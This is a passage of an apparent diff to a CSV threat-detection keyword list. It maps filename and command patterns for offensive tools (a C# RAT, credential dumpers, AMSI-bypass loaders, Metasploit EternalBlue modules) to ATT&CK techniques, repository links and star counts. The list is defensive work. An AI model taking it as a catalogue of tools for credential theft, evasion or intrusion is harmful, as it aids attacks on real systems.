Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*mr.un1k0d3r@gmail.com*","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. 
HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","1","N/A","10","10","759","254","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z" "*Mr-B0b/SpaceRunner*","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","1","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" "*Mr-Cyb3rgh0st/Excel-Exploit*","offensive_tool_keyword","Excel-Exploit","MacroExploit use in excel sheet","T1137.001 - T1203 - T1059.007 - T1566.001 - T1564.003","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Mr-Cyb3rgh0st/Excel-Exploit/tree/main","1","1","N/A","N/A","1","21","4","2023-06-12T11:47:52Z","2023-06-12T11:46:53Z" -"*mrd0x/BITB*","offensive_tool_keyword","bitb","Browser templates for Browser In The Browser (BITB) attack","T1056.001 - T1134 - T1090","TA0005 - TA0006 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/mrd0x/BITB","1","1","N/A","10","10","2645","463","2023-07-11T04:57:46Z","2022-03-15T16:51:39Z" +"*mrd0x/BITB*","offensive_tool_keyword","bitb","Browser templates for Browser In The Browser (BITB) attack","T1056.001 - T1134 - T1090","TA0005 - TA0006 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/mrd0x/BITB","1","1","N/A","10","10","2646","464","2023-07-11T04:57:46Z","2022-03-15T16:51:39Z" "*mremoteng_decrypt.py*","offensive_tool_keyword","mRemoteNG-Decrypt","Python script to decrypt passwords stored by mRemoteNG","T1589 T1003 T1563 T1552 T1098 T1021","N/A","N/A","N/A","Credential Access","https://github.com/haseebT/mRemoteNG-Decrypt","1","1","N/A","N/A","2","111","39","2023-07-06T16:15:20Z","2019-05-27T05:25:57Z" 
-"*mRemoteNG-local.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","731","94","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" -"*MrEmpy/Reaper*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","1","N/A","10","1","61","18","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" +"*mRemoteNG-local.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*MrEmpy/Reaper*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","1","N/A","10","1","62","19","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" "*Mr-Un1k0d3r*","offensive_tool_keyword","Github Username","github username Mostly Red Team tools for penetration testing. 
Twitter - @MrUn1k0d3r","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/Mr-Un1k0d3r","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*ms_teams_exports_usernev_dll.txt*","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","3","280","41","2023-09-21T14:01:23Z","2023-05-15T13:02:54Z" -"*ms04_007_killbill.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*ms_teams_exports_usernev_dll.txt*","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","0","N/A","9","3","282","41","2023-09-21T14:01:23Z","2023-05-15T13:02:54Z" +"*ms04_007_killbill.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*ms14-068.py -u *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*ms14-068.py -u*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*ms14-068_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*ms17_010_eternalblue*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*ms17_010_eternalblue.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*ms17_010_psexec*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*ms17_010_psexec.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*MS17-010*","offensive_tool_keyword","POC","MS17-010 poc github repos","T1204.002","TA0002","N/A","N/A","Exploitation tools","https://github.com/worawit/MS17-010","1","0","N/A","N/A","10","2048","1127","2023-06-20T08:27:19Z","2017-06-19T16:47:31Z" -"*ms17-010_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*ms14-068_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*ms17_010_eternalblue*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ms17_010_eternalblue.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ms17_010_psexec*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ms17_010_psexec.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*MS17-010*","offensive_tool_keyword","POC","MS17-010 poc github repos","T1204.002","TA0002","N/A","N/A","Exploitation tools","https://github.com/worawit/MS17-010","1","0","N/A","N/A","10","2049","1127","2023-06-20T08:27:19Z","2017-06-19T16:47:31Z" +"*ms17-010_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*MSBuild.exe NetLoader.xml*","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Exploitation tools - Defense Evasion","https://github.com/Flangvik/NetLoader","1","0","N/A","10","7","684","139","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z" "*MSBuildShell*","offensive_tool_keyword","MSBuildShell","a Powershell Host running within MSBuild.exe This code lets you Bypass Application Whitelisting and Powershell.exe restrictions and gives you a shell that almost looks and feels like a normal Powershell session (Get-Credential. PSSessions -> Works. Tab Completion -> Unfortunately not). 
It will also bypass the Antimalware Scan Interface (AMSI). which provides enhanced malware protection for Powershell scripts","T1027 - T1086 - T1059 - T1064 - T1089","TA0002 - TA0003 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Cn33liz/MSBuildShell","1","1","N/A","N/A","3","274","81","2019-08-02T06:46:52Z","2016-11-11T18:52:38Z" -"*MScholtes/PS2EXE*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","9","834","154","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z" -"*msf_api_doc.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*MScholtes/PS2EXE*","offensive_tool_keyword","PS2EXE","Module to compile powershell scripts to executables","T1027.001 - T1564.003 - T1564.005","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/MScholtes/PS2EXE","1","1","N/A","N/A","9","838","155","2023-09-26T15:03:14Z","2019-11-08T09:25:02Z" +"*msf_api_doc.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*msf_cve_extracter.py*","offensive_tool_keyword","Xerror","fully automated pentesting tool","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Chudry/Xerror","1","1","N/A","N/A","5","458","106","2022-12-08T04:33:03Z","2019-08-16T21:20:52Z" -"*msf_exec.py*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*msf_matchers*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*msf_exec.py*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*msf_matchers*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*msf_payload.ps1*","offensive_tool_keyword","nps_payload","This script will generate payloads for basic intrusion detection avoidance","T1027 - T1027.005 - T1055 - T1211","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/trustedsec/nps_payload","1","1","N/A","9","5","421","130","2017-08-08T14:12:48Z","2017-07-23T17:01:19Z" "*msf-auxiliarys*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" "*msfconsole *","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://www.metasploit.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" -"*msfconsole*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*msfconsole.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. 
and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*msfconsole_spec*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*msfcrawler.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*msfd.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*msfdb --component*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 